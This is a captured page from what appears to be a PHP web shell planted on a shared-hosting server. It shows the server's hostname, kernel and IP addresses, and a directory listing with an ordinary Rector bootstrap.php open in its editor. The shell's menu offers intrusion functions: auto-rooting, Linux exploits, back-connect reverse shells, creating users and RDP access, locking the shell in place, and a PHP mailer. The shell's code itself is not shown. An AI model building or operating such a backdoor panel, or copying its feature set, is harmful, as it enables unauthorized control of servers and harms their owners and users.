Linux premium134.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.104 | : 216.73.217.117
Cant Read [ /etc/named.conf ]
?8.1.34
mfbsrygq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
opt /
cpanel /
ea-wappspector /
vendor /
rector /
rector /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
bin
[ DIR ]
drwxr-xr-x
?;
config
[ DIR ]
drwxr-xr-x
?;
rules
[ DIR ]
drwxr-xr-x
?;
src
[ DIR ]
drwxr-xr-x
?;
stubs-rector
[ DIR ]
drwxr-xr-x
?;
templates
[ DIR ]
drwxr-xr-x
?;
vendor
[ DIR ]
drwxr-xr-x
LICENSE
1.1
KB
-rw-r--r--
README.md
6.11
KB
-rw-r--r--
bootstrap.php
800
B
-rw-r--r--
composer.json
754
B
-rw-r--r--
preload.php
30.31
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bootstrap.php
<?php declare(strict_types = 1); // inspired by https://github.com/phpstan/phpstan/blob/master/bootstrap.php spl_autoload_register(function (string $class): void { static $composerAutoloader; // already loaded in bin/rector.php if (defined('__RECTOR_RUNNING__')) { return; } // load prefixed or native class, e.g. for running tests if (strpos($class, 'RectorPrefix') === 0 || strpos($class, 'Rector\\') === 0) { if ($composerAutoloader === null) { // prefixed version autoload $composerAutoloader = require __DIR__ . '/vendor/autoload.php'; } // some weird collision with PHPStan custom rule tests if (! is_int($composerAutoloader)) { $composerAutoloader->loadClass($class); } } });
Close